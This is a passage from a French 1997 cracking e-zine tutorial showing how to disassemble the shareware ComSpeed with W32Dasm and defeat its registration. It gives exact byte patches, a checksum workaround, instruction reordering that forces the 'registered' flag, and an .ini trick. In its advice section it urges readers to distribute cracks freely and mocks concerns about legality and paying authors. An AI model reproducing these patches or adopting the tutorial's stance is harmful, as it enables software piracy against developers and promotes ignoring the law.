du programme presque toujours facilement localisable et n'en sortent
que très rarement
en raison de la limitation des registres du CPU.
Bien sur, pour de meilleurs résultats, la combinaison de ces
deux méthodes ne peut etre
que bénéfique.
Comme ComSpeed ne fait que 53 Ko, nous utiliserons le "Dead Listing".
De plus, il n'existe
pratiquement pas de cours en Français sur cette technique.
Nous avons besoin pour ce crack de W32Dasm6 (ou W32Dasm85).
--------------------------------------------------------------------------------
N'utilisez PAS W32Dasm7 ou W32Dasm8!!!!
J'utilise ici W32Dasm6 parce que suivant le programme que vous avez
a désassembler (16bits
ou 32bits...), si vous utilisez differentes versions de W32Dasm vous
n'obtiendrez JAMAIS
le même résultat.
Si vous désassemblez ComSpeed avec W32Dasm6 vous obtiendrez
beaucoup de 'String Datas
References'(cf ci-dessous), tandis que vous n'en n'obtiendrez AUCUNES
avec W32Dasm7 ou 8.
De plus W32Dasm n'est pas un très bon désassembleur et
même son schéma de protection est
ridicule. Je vous expliquerai très prochainement comment le
craquer.
--------------------------------------------------------------------------------
Bon assez de bla-bla, place au boulot:
2/ EXECUTION DU CRACK
Lancez W32Dasm6 et ouvrez CompSpeed.
Nous allons rechercher le maximum d'infos. Ce sont essentiellements
des chaines de
caractères (les 'String Datas References' dont je vous parlait
ci-dessus) contenants
les mots du genre "Enter Your PassWord", "Wrong Password", "PassWord
IS correct", "You are
using this program for xxxx days"....Trouver ces mots est avant tout
l'essence même du
'Dead Listing'.
Appuyez dans la barre à outils sur le boutton 'string Datas References'.
On trouve, entre autres, dans la liste qui s'affiche:
CodeFalse_
CodeOk_
N'est-ce pas déjà merveilleux!
On a presque tout ici, la routine qui s'execute quand le mot de passe
est correct (CodeOK_)
et celle du mauvais mot de passe.
Plus bas dans la liste on trouve aussi:
VIRUS_
(ça, nous verrons plus loin...:-).
On a assez d'informations pour commencer le crack.
Cliquez sur 'CodeOK_' et W32Dasm vous envoie directement à cette
routine qui commence à
l'adresse 0011.0271. Juste après, on trouve la procédure
CodeFalse_ en 0011.02A4.
Jettons un oeil sur "CodeOk_":
:0011.0262 9AFFFF0000
call 0012.02E5h
:0011.0267 08C0
or al , al
:0011.0269 7433
je 029E
;< Excellent
:0011.026B FF76F0
push word ptr [bp+F0]
:0011.026E FF76EE
push word ptr [bp+EE]
* Possible StringData Ref from Data Seg 017 ->"CODEOK_%s" ;< **ICI**
:0011.0271 BFF104
mov di, 04F1
:0011.0274 1E
push ds
On trouve un joli saut conditionnel (je 029E) qui nous enverra sur la
procedure "CodeFALSE_"
si le mot de passe est incorrect.
On le change:
:0011.0269 7533 jne 029E
Maintenant le programme ira sur "CodeOK_" quand le mot de passe sera faux.
Lancez ComSpeed après cette modification faite avec un éditeur
hexadécimal:
Le programme refuse de démarrer et vous dit:
"The .exe file has been modified! That can be a Virus...".
Vous vous souvenez de "VIRUS_" que nous avions trouvé dans la
liste des 'String References
Datas'??
C'est un CheckSum. Le programme additionne les bytes et vérifie
le résultat.
Facile a contourner:
Nous avons changé un 74 (je) par un 75 (jne) donc nous allons modifier le 33 qui le suit:
Nous avions:
:0011.0269 7533
On le change avec:
:0011.0269 7532
Au départ nous avions 74+33 et maintenant 75+32: ça donne
le même résultat. On se fiche pas
mal de modifier l'adresse du saut puis le programme n'exécutera
jamais ce saut (sauf si
vous entrez le bon mot de passe)
Après, on relance ComSpeed: Ca marche.
Essayez de vous enregistrer (Shareware/Enter Code...). Entrez votre
nom et n'importe quel
mot de passe puis appuyez sur OK. Là encore, ça marche.
Maintenant quittez ComSpeed puis relancez-le: Il n'est plus enregistré.
En fait nous ne nous sommes débarassé que de la procédure
de vérification du mot de passe
entré au clavier. Le progamme vérifie au démarrage
le mot de passe (qu'il lit dans
ComSpeed.ini) avec le bon mot de passe.
Etait-ce donc nécessaire de craquer cette partie? Non, mais ça
ne nous a pris que 5mn et
maintenant si vous ouvrez ComSpeed.ini, vous saurez de qu'elle manière
le programme y
inscrit votre nom et mot de passe:
SwName=_Votre_Nom
SwCode=_Votre_Mot_De_Passe
Bon, maintenant c'est le moment de faire marcher sa cervelle.
On étant ses pieds sous le bureau, on remonte les manches, on
s'allume une cigarette....et
on se concentre:
Regardez le menu de ComSpeed.
Il y a:
File / Com-Port() / Shareware / Help.
Vous avez peut-etre remarqué (n'est-ce pas?) que quand vous vous
êtez enregistré il y a
quelques minutes celui-ci s'est tranformé en:
File / Com-Port() / Help.
Et oui, 'Shareware' disparait de la barre des menus quand le programme
est enregistré.
Execellent!
On retourne dans W32Dasm6:
Appuyez dans la barre à outils sur le boutton 'Imports Functions'.
Une liste de toutes les fonctions de Windows (les API) qui sont utilisées
par ComSpeed
s'y trouve. Elles permettent, entre autre, a un programme d'utiliser
une interface
graphique 100% Windows...
Pour créer une Barre des Menus, un programme Windows doit appeller
la fonction
USER!DrawMenuBar. Cliquez sur elle (dans la liste) plusieurs fois pour
localiser tous
les appels à celle-ci dans ComSpeed.
On ne trouve que deux appels.
Le deuxième est tout a fait intéressant:
:0001.1756 9AFFFF0000 call 0011.0122h
:0001.175B 803ED00400 cmp byte ptr [04D0],
00 ; < 04D0=0??
:0001.1760 7531
jne 1793
; < Si <>0 alors 'Unregistered'
:0001.1762 FF363C0A push word ptr
[0A3C]
:0001.1766 FF363A0A push word ptr
[0A3A]
:0001.176A 9AFFFF0000 call 0006.0044h
:0001.176F FF363407 push word ptr
[0734]
:0001.1773 6A02
push 0002
:0001.1775 680004 push
0400
:0001.1778 9AFFFF0000 call USER.DELETEMENU
; < Efface Menu car 'Registered'
:0001.177D FF760E push
word ptr [bp+0E]
:0001.1780 9AFFFF0000 call USER.DRAWMENUBAR
; < **ICI**
:0001.1785 FF760E push
word ptr [bp+0E]
:0001.1788 6A00
push 0000
On voit que USER!DeleteMenu va effacer la barre des menus et tout de
suite derrière,
DrawMenuBar va en créér une autre toute jolie sans le
mot 'Shareware'.
Au dessus, on trouve encore un saut conditionel (Jne 1793) qui, si
04D0 est différent de 0
nous fera sauter par dessus ces deux fonctions.
On en déduit tout simplement que si 'byte ptr [04D0] = 0' alors
le programme est
'Registered'.
Si vous cherchez 'cmp byte ptr [04D0], 00' dans le listing de ComSpeed,
vous le trouverez
10 fois.
Maintenant, on va chercher l'instruction qui va écrire à l'adresse 04D0:
Cherchez: 04D0
On en trouve une seule:
:0011.0D27 9AFFFF0000 call 0012.02E5h
:0011.0D2C 08C0
or al , al
:0011.0D2E B000
mov al, 00
; al:=0
:0011.0D30 7501
jne 0D33
; Rien à cirer
:0011.0D32 40
inc ax
; al:=al+1
:0011.0D33 A2D004 mov [04D0],
al
; **ICI** 04D0=al
:0011.0D36 803ED00400 cmp byte ptr [04D0], 00
; Encore!
:0011.0D3B 7527
jne 0D64
; Si 04D0<>0 =>Unregistered
:0011.0D3D FF36D404 push word ptr [04D4]
:0011.0D41 FF36D204 push word ptr [04D2]
Et voila M'sieurs Dames.
Devons nous changer le 'jne 0D64' avec un 'je 0D64'? Non. N'oubliez
pas le checksum et
le fait que vous devriez changer les 10 sauts conditionels suivants
les 10 'cmp byte
ptr [04D0], 00'.
Pour ce type de crack j'utilise toujours le même vieux truc:
Etant donné qu'on ne peut pas modifier trop de bytes en raison
du checksum, rien
(mais alors vraiment rien) ne nous empêche d'intervertir les
intructions.
Exemple:
Nous avions:
:0011.0D2E B000
mov al, 00
:0011.0D30 7501
jne 0D33
:0011.0D32 40
inc ax
:0011.0D33 A2D004 mov [04D0],
al
:0011.0D36 803ED00400 cmp byte ptr [04D0], 00
:0011.0D3B 7527
jne 0D64
Peut être changé en:
:0011.0D2E 7501
jne 0D31
; Toujours rien à cirer
:0011.0D30 40
inc ax
; al:=al+1
:0011.0D31 B000
mov al, 00
; al:=0 < Voila!
:0011.0D33 A2D004 mov [04D0],
al
:0011.0D36 803ED00400 cmp byte ptr [04D0], 00
:0011.0D3B 7527
jne 0D64
Maintenant "al:=0" et l'instruction "mov [04D0], al" donnera la valeur
0 (donc 'Registered')
dans "04D0".
ComSpeed ne s'appercevra jamais de ces modifications et le résultat
de "cmp byte
ptr [04D0], 00" sera toujours VRAI et ceci tout au long du programme.
ComSpeed est maintenant enregistré.
3/ CONSEILS
Que choisir : Live Approach ou Dead Listing??
Personne ne pourra vous répondre....
Effectivement, chaque Cracker a ses préférences.
Moi, je commence toujours avec SoftIce (v3.01) histoire de savoir ce
que fait le programme,
ses differents appels aux API...bref juste pour savoir a qui j'ai a
faire.
Je verifie aussi qu'il n'est pas écrit (mal-écrit) en
Visual Basic (tout bon programmeur
n'écrit JAMAIS en Visual Basic) puis je le désassemble
car cette technique est la plus cool
et la plus zen des deux (passer des heures devant l'écran de
SoftIce peut se révéler assez
pénible tandis que désassembler un fichier puis imprimer
les parties de code intéressantes
pour aller les étudier (et les craquer) à la terrasse
d'un café sur les Quais de la Mégisserie
en buvant une Leffe fait partie des ces habitudes qui rendent la vie
du cracker tellement
plus agréable...:-).
Chacun ses gouts.
De toute façon, l'idéal est de combiner ces deux techniques
pour pouvoir TOUT craquer.
Attention: Certains programmes (de plus en plus) détectent si
SoftIce est chargé et
risquent de vous planter ou rebooter. Mais d'autres (ou les mêmes
une fois qu'ils se seront
débarasser de SoftIce) vous planteront si tentez vous les désassembler.
C'est le cas de SmartDraw v3.11 Win95. Si vous essayez de craquer ce
programme en le traçant
avec SoftIce vous avez de grandes chances pour qu'il vous plante et
soyez obligé de rebooter.
De plus il est impossible de le désassembler (toutes versions
de W32Dasm confondues).
En fait, les auteurs de tels logiciels n'écrivent pas cette
protection mais font appel à des
programmes de protection très couteux (EverLock, Copy Control)
qu'ils intègrent à leurs
softs.
C'est généralement suffisant pour faire abandonner les
petits crackers. Mais ne vous
dégonflez pas:
Vous n'avez pas besoin de SoftIce ou W32Dasm pour craquer SmartDraw.
Avec un simple éditeur
hexadécimal (comme HexWorkShop) il ne vous faudra pas plus de
5mn pour le craquer à 90%.
Mais cela sera pour plus tard...ne grillez pas les étapes. Prennez
et craquez des logiciels
de votre niveau (comme ComSpeed) pour l'instant.
Dès que vous aurez craqué votre programme, executez le
avec SoftIce de nombreuses fois pour
être sûr de n'avoir rien oublié (en craquant à
un endroit on peut déclencher ulterieurement
une autre protection "cachée"...) bref VERIFIEZ que votre crack
est totalement FIABLE.
Dès que votre crack est bon, DISTRIBUEZ-LE (gratuitement evidemment)
a tous ceux qui ne
peuvent pas s'acheter le programme enregitré et aussi aux crétins
qui ne seraient même pas
capables de réaliser 1/10e de votre crack. Et surtout EVITEZ
les trucs du genre:
-"Je vous passe ce crack mais vous n'avez pas le droit de vous en servir,
c'est illégal".
ou bien:
-"Moi je crack des programmes? Oui bien sûr, mais quand je les
utilises longtemps
je m'enregistre auprès de leurs auteurs".
CA VA PAS, NON??!!!
On est des CRACKERS, des VRAIS, des DURS, des PURS.
Qui vous a parlé de "légalité"? Pourquoi faire
confiance à un crétin de programmeur alors
qu'il n'a même pas été capable d'écrire
un bon schéma de protection puisque vous l'aurez
craqué en 5mn? Vous acheteriez un programme à un type
comme ça vous? Moi non.
4/ LIVRES
Vous trouverez de très nombreux ouvrages sur l'informatique et
le PC mais peu sont réellement
adaptés à nos besoins. En voici donc 2 particulièrement
indispensables et faciles a trouver:
-Assembleur:
"Assembleur Pratique" - de Bernard Fabrot chez Marabout Collection
"Best-Sellers de
l'informatique" 1996.
Pour un prix modeste de 50 balles et un format livre de poche, c'est
a mon avis ce qui ce fait
de mieux pour apprendre ce merveilleux langage. Destiné au mode
32 bits, cette mise à jour
succède à "Assembleur facile" ( de P.Mercier qui avait
écrit de très bons ouvrages sur le BIOS
et la programmation DOS:=) qui lui ne concernait que le 16 bits. Ils
ont bien fait de
changer le titre pour cette nouvelle version! N'essayez pas de l'apprendre
par coeur, vous
n'y arriverez pas. Contentez-vous de l'avoir sous la main à
chaque fois que vous rencontrerez
un instruction que vous ne connaissez pas, et ça finira bien
par rentrer...
-API:
"Programmation des API -Windows 95 Win32" de Richard Simon chez Simon
& Schuster Macmillan
France - coll. "Secrets d'experts" (+ CD-ROM).
Là, il vous faudra dépenser 399FF (je vous ai déjà
fait économiser $11 en vous apprenant a
craquer ComSpeed!! :=) mais il vaut bien son prix car je n'en n'ai
jamais trouver d'autres
aussi complets. Tout y est classé par catégorie (E/S,
Menus, Boites de dialogue, registre...)
et très bien détaillé. De nombreux exemples sur
le CD-ROM avec leur source. Très bien.
Voila, d'autres cours suivronts ...
Frog's Print -06/97
(http://www.ThePentagon.com/frog_s_print)
PS: J'allais oublier, ouvrez le fichier ComSpeed.ini et a coté
des lignes suivantes
rajoutez votre nom:
SwName=Mettez_Votre_Nom
SwCode=Merci_Frog's_Print
Lancez ensuite ComSpeed et appuyez sur 'Help' - 'About' et le tour
est joué...
Voilà cet E-mag est fini! Vous pouvez m'écrire à: clad_strife@hotmail.com
Clad Strife